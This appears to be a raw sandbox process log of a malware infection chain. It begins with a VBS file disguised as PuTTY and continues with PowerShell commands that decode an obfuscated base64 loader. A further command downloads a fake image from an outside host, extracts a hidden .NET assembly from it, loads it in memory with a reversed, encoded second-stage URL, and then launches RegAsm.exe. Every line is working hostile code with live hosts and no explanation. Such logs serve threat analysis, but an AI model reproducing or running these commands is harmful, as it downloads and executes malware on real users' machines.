wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Vbs-File0008765putty.vbs
1648powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = '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KGXkhpYIrIKGXHMhpYIrIKGXdhpYIrIKGXBhhpYIrIKGXHIhpYIrIKGXdhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXZQhpYIrIKGXghpYIrIKGXDhpYIrIKGXhpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGEhpYIrIKGXbgBkhpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXGchpYIrIKGXdhpYIrIKGXhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEkhpYIrIKGXbgBkhpYIrIKGXGUhpYIrIKGXehpYIrIKGXhpYIrIKGXghpYIrIKGXCshpYIrIKGXPQhpYIrIKGXghpYIrIKGXCQhpYIrIKGXcwB0hpYIrIKGXGEhpYIrIKGXcgB0hpYIrIKGXEYhpYIrIKGXbhpYIrIKGXBhhpYIrIKGXGchpYIrIKGXLgBMhpYIrIKGXGUhpYIrIKGXbgBnhpYIrIKGXHQhpYIrIKGXahpYIrIKGXhpYIrIKGX7hpYIrIKGXCQhpYIrIKGXYgBhhpYIrIKGXHMhpYIrIKGXZQhpYIrIKGX2hpYIrIKGXDQhpYIrIKGXThpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZwB0hpYIrIKGXGghpYIrIKGXIhpYIrIKGXhpYIrIKGX9hpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBlhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBJhpYIrIKGXG4hpYIrIKGXZhpYIrIKGXBlhpYIrIKGXHghpYIrIKGXIhpYIrIKGXhpYIrIKGXthpYIrIKGXChpYIrIKGXhpYIrIKGXJhpYIrIKGXBzhpYIrIKGXHQh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';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('hpYIrIKGX','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
2136powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://imageupload.io/ib/ws8MAJ6eptiLfGu_1697738492.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LnNrbmlMeXR0dVAvZWxpZi8yMTIuMzExLjU3MS43MDEvLzpwdHRo' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))"
2272RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2680